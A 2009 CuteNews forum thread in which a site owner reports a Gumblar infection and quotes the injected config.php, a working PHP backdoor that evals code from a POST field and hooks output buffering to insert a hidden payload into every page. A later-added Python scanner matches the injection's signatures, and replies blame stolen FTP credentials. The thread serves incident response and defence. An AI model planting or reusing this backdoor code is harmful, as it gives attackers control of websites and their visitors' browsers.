nolikewise
Joined: 17 Dec 2007 Posts: 149 Location: Turkiye
gumblar.cn virus php exploit code
Hi all CNR users and team,
I'd like to share one of my bad experiences. 5 minutes ago I noticed that my website is loading content from gumblar.cn and I got it was an exploit thing.
After editing and searching all of my files, I found that
/data/config.php had a long function which goes like that
<?php
if(!function_exists('tmp_lkojfghx')){
    // Backdoor: any PHP sent in this POST field is executed on the server.
    if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
    // The injected HTML/script payload, stored base64-encoded (omitted here).
    if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('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'));
    // Output-buffer callback: strips competing injected <script> blocks, then
    // inserts the payload before <body> (or appends it) on every page served.
    function tmp_lkojfghx($s){
        if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
        if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
            foreach($a[0] as $v)
                if(count(explode("\n",$v))>5){
                    $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
                    if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);
                }
        $s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);
        if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);
        elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
        return $g?gzencode($s):$s;
    }
    // Installs the callback as the outermost output buffer, re-wrapping any
    // buffers the application already opened so the filter always runs last.
    function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){
        $s=array();
        if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
        foreach(@ob_get_status(1) as $v)
            if(($a=$v['name'])=='tmp_lkojfghx')return;
            else $s[]=array($a=='default output handler'?false:$a);
        for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}
        ob_start('tmp_lkojfghx');
        for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}
    }
}
// Registered as the error handler so it re-installs itself on any PHP error,
// chaining to the application's original handler saved in $GLOBALS['tmp_xhgfjokl'].
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;
tmp_lkojfghx2();
?>
and it exploits and freezes the browser.
How come anyone could add it in my config.php? Am I safe enough to hide my sql pass and others?
I am doubtful about filezilla because I had the same thing before. Filezilla's bugs sometimes cause these exploits.
Any idea?
And FI-DD, please have a look at that link and direct us to protect our files more...
Help my php site has been exploited or hacked. What can I do to make sure this does not happen again?
http://helpdesk.hostmonster.com/kb/index.php?x=&mod_id=2&id=271
Mon May 11, 2009 2:23 pm
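A small file scanner, added here as an example (not code from this post or from CuteNews), that flags files carrying the indicators visible in the injected config.php above: the eval of a POST field, the tmp_lkojfghx/TMP_XHGFJOKL names, the base64-decoded define, the ob_start handler and the set_error_handler hook. The file paths and the sample file contents are constructed; the base64 payload is replaced by a placeholder.

```python
import re

# Indicators taken from the injected config.php quoted above (hypothetical
# scanner, not part of the original post or of CuteNews).
GUMBLAR_INDICATORS = [
    # Backdoor: attacker-supplied PHP executed straight from a POST field.
    ("eval_of_post", re.compile(r"eval\s*\(\s*\$_POST\s*\[")),
    # Function and constant names used by this particular injection.
    ("tmp_lkojfghx_names", re.compile(r"tmp_lkojfghx|TMP_XHGFJOKL", re.I)),
    # Payload hidden in a base64-decoded constant.
    ("base64_define", re.compile(r"define\s*\(\s*['\"]\w+['\"]\s*,\s*base64_decode\s*\(")),
    # Output buffering hijacked so the payload is inserted before <body>.
    ("ob_start_handler", re.compile(r"ob_start\s*\(\s*['\"]tmp_\w+['\"]\s*\)")),
    # Error handler abused as the hook that re-installs the output filter.
    ("error_handler_hook", re.compile(r"set_error_handler\s*\(\s*['\"]tmp_\w+")),
]

def scan_source(text):
    """Return the names of all indicators found in one file's contents."""
    return [name for name, rx in GUMBLAR_INDICATORS if rx.search(text)]

def scan_tree(files):
    """files: {path: contents}. Return {path: [indicators]} for flagged files only."""
    report = {}
    for path, text in files.items():
        hits = scan_source(text)
        if hits:
            report[path] = hits
    return report

# Constructed sample tree: a clean include and a config.php carrying a
# shortened copy of the injection (base64 payload replaced by a placeholder).
SAMPLE_FILES = {
    "data/config.php": (
        "<?php if(!function_exists('tmp_lkojfghx')){"
        "if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);"
        "if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PAYLOAD_PLACEHOLDER'));"
        "function tmp_lkojfghx($s){return $s;}"
        "function tmp_lkojfghx2(){ob_start('tmp_lkojfghx');}}"
        "if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;"
        "tmp_lkojfghx2(); ?>\n"
    ),
    "inc/functions.php": "<?php function cn_escape($s){ return htmlspecialchars($s); } ?>\n",
}

if __name__ == "__main__":
    # Expected: only data/config.php is reported, with all five indicators.
    for path, hits in scan_tree(SAMPLE_FILES).items():
        print(path, "->", ", ".join(hits))
```

In a real clean-up the same scan should be run over every file type on the account, not only .php, and any flagged file restored from a known-good copy rather than edited in place.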
FI-DD
Admin

Joined: 22 Sep 2005 Posts: 2973 Location: Germany
All I can say is that the /data/ folder is protected by a .htaccess file. So I have no idea how this happened.
Tue May 12, 2009 6:03 pm
cablegunmaster
Joined: 05 May 2009 Posts: 34
Thu May 14, 2009 8:39 am
mark99
Joined: 09 Feb 2009 Posts: 127
It's worth remembering that .htaccess is fallible; you can't rely on just that to secure the dir, there has to be a good setup of CHMODs as well. It is possible to change the default CHMOD by fiddling with the ROOT head.php file - define('chmod', 0777); - but this makes a universal change and so can cause problems. I think I found a setting that worked but I can't recall what it was.
Thu May 14, 2009 12:06 pm
Torstein
Joined: 03 Aug 2006 Posts: 276
It does however look like this is actually malware that you have on your computer that uses your FTP username and password to infect your files, so it isn't a PHP/CuteNews.RU exploit. From the link it looks like it puts code into all files on your FTP, including .htaccess, .php, .html, .js, etc.
Thu May 14, 2009 12:12 pm
nolikewise
Joined: 17 Dec 2007 Posts: 149 Location: Turkiye
Sat May 16, 2009 10:59 am
azn_romeo_4u
Joined: 18 Sep 2008 Posts: 118
It's not the script. It's your FTP. Someone got into your FTP and did it. Change your FTP password to something better with more characters: letters, numbers, and symbols if possible.
Tue Jul 28, 2009 8:01 pm